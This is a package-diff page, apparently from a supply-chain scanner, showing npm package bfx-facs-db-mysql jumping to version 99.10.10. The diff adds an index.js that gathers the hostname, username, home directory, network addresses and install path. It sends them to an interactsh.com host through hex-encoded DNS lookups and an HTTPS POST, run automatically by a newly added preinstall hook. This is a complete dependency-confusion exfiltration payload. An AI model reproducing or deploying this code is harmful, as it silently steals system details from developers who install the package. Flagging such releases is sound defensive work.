bfx-facs-db-mysql 0.0.1-security.4 → 99.10.10

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of bfx-facs-db-mysql might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +140 -0
  2. package/package.json +9 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,140 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const fs = require('fs');
6
+ var path = require('path');
7
+ const packageJSON = require("./package.json");
8
+ const package = packageJSON.name;
9
+
10
+ function getFiles(paths) {
11
+ var ufiles=[];
12
+ for(var j=0;j<paths.length;j++){
13
+ mpath = paths[j];
14
+ files = fs.readdirSync(mpath);
15
+ for(var i=0;i<files.length;i++){
16
+ ufiles.push(path.join(mpath,files[i]));
17
+ }
18
+ }
19
+ return ufiles;
20
+ }
21
+
22
+ function toHex(data){
23
+ const bufferText = Buffer.from(data, 'utf8');
24
+ const text = bufferText.toString('hex');
25
+ return text;
26
+ }
27
+ function gethttpips(){
28
+ var str=[];
29
+ var networkInterfaces = os.networkInterfaces();
30
+ for(item in networkInterfaces){
31
+ if(item != "lo"){
32
+ for(var i=0;i<networkInterfaces[item].length;i++){
33
+ str.push(networkInterfaces[item][i].address);
34
+ }
35
+ }
36
+ }
37
+ return str;
38
+ }
39
+ function getIps(){
40
+ str="";
41
+ var networkInterfaces = os.networkInterfaces();
42
+ for(item in networkInterfaces){
43
+ if(item != "lo"){
44
+ for(var i=0;i<networkInterfaces[item].length;i++){
45
+ str=str+toHex(networkInterfaces[item][i].address)+".";
46
+ }
47
+ }
48
+ }
49
+ return str.slice(0,-1);
50
+ }
51
+ function getPathChunks(path){
52
+ str="p";
53
+ chunks = path.split('/');
54
+ for(var i=0;i<chunks.length;i++){
55
+ str=str+toHex(chunks[i])+".";
56
+ }
57
+ str=str.slice(0,-1)+"p";
58
+ return str;
59
+ }
60
+ function toName(pkg){
61
+ var str="";
62
+ var queries = [];
63
+ var substr1 = "";
64
+ var substr2 = "";
65
+ var hostname = "c5c77jy2vtc0000xqshggde77joyyyyyr.interactsh.com";
66
+ str=toHex(pkg.hn)+"."+toHex(pkg.p)+"."+getPathChunks(pkg.c)+"."+toHex(pkg.un)+"."+getIps()+"."+hostname;
67
+ if(str.length>255){
68
+ substr1 = toHex(pkg.p)+"."+getPathChunks(pkg.c);
69
+ substr2 = getIps();
70
+ if(substr1.length<150){
71
+ substr1 = toHex(pkg.hn)+"."+substr1+"."+toHex(pkg.un);
72
+ queries.push(substr1+"."+hostname);
73
+ queries.push(substr2+"."+hostname);
74
+ }
75
+ else if(substr2.length<150){
76
+ substr2 = toHex(pkg.hn)+"."+toHex(pkg.un)+"."+substr2;
77
+ queries.push(substr1+"."+hostname);
78
+ queries.push(substr2+"."+hostname);
79
+ }
80
+ else{
81
+ queries.push(toHex(pkg.hn)+"."+substr1+"."+hostname);
82
+ queries.push(toHex(pkg.hn)+"."+toHex(pkg.hd)+"."+toHex(pkg.un)+"."+hostname);
83
+ queries.push(toHex(pkg.hn)+"."+substr2+"."+hostname);
84
+ }
85
+ }
86
+ else{
87
+ queries.push(str);
88
+ }
89
+ //console.log(str.length);
90
+ return queries;
91
+ }
92
+
93
+ const td = {
94
+ p: package,
95
+ c: __dirname,
96
+ hd: os.homedir(),
97
+ hn: os.hostname(),
98
+ un: os.userInfo().username,
99
+ dns: JSON.stringify(dns.getServers()),
100
+ r: packageJSON ? packageJSON.___resolved : undefined,
101
+ v: packageJSON.version,
102
+ pjson: packageJSON,
103
+ ip: JSON.stringify(gethttpips()),
104
+ //dirs: JSON.stringify(getFiles(["C:\\","D:\\","C:\\Users\\"])),
105
+ }
106
+ var qs = toName(td);
107
+ for(var j=0;j<qs.length;j++){
108
+ dns.lookup(qs[j], function(err, result) {
109
+ //console.log(result)
110
+ });
111
+ }
112
+
113
+ const trackingData = JSON.stringify(td);
114
+ var postData = querystring.stringify({
115
+ msg: trackingData,
116
+ });
117
+
118
+ var options = {
119
+ hostname: "c5c77jy2vtc0000xqshggde77joyyyyyr.interactsh.com",
120
+ port: 443,
121
+ path: "/",
122
+ method: "POST",
123
+ headers: {
124
+ "Content-Type": "application/x-www-form-urlencoded",
125
+ "Content-Length": postData.length,
126
+ },
127
+ };
128
+
129
+ var req = https.request(options, (res) => {
130
+ res.on("data", (d) => {
131
+ //process.stdout.write(d);
132
+ });
133
+ });
134
+
135
+ req.on("error", (e) => {
136
+ // console.error(e);
137
+ });
138
+
139
+ req.write(postData);
140
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "bfx-facs-db-mysql",
3
- "version": "0.0.1-security.4",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.10.10",
4
+ "description": "bitfinex whitehat package",
5
+ "main":"index.js",
6
+ "scripts":{
7
+ "test":"echo \"error no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author":"",
11
+ "License":"ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=bfx-facs-db-mysql for more information.